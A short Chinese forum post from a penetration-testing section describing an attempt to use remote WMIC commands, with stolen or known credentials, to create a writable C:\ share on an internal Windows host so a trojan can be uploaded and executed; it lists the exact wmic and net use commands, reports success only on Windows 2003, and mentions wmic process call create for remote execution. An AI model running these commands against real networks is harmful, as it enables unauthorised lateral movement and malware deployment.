wmic 远程建立可写入共享,一种思路及实践

2015-11-20 10:29:56 11 4723 3
内网渗透时候,上传木马经常没有默认共享,不可写入的共享文件夹
后面初步接触wmic,认识了wmic远程强大的功能,于是想到了远程主机给主机建立可写入的共享,然后上传木马上去执行目标主机win2008
使用share别名
wmic share call create /?  
查看一下参数


命令如下:
wmic /node:ip /user:user /password:password share call create "","共享文件","","Cpan","","C:\","0"
但是
net use z: \\ip\Cpan "pass" /user:user
上去没有写入权限
后面想到了,type参数我给的值为0,应该是这里出了问题,导致权限不够
wmic share list full
一下,



默认共享type=-2147483648,windows默认共享是具备写入权限的,于是我们命令就写成
wmic /node:ip /user:user /password:password share call create "","共享文件","","Cpan","","C:\","-2147483648"
也是不行。

总结:win2008,win7远程wmic共享文件夹都不具备写入权限,但是在win2003type值为0都具有写入权限,此方法适合win2003吧,当然,如果你只想查看目标主机的文件,这条命令也适合。
其他的wmic process call create "command" 也是一条经常应用的命令。
类别 渗透测试

关于作者

EMing28篇文章180篇回复

EMing
11

评论11次

要评论?请先  登录  或  注册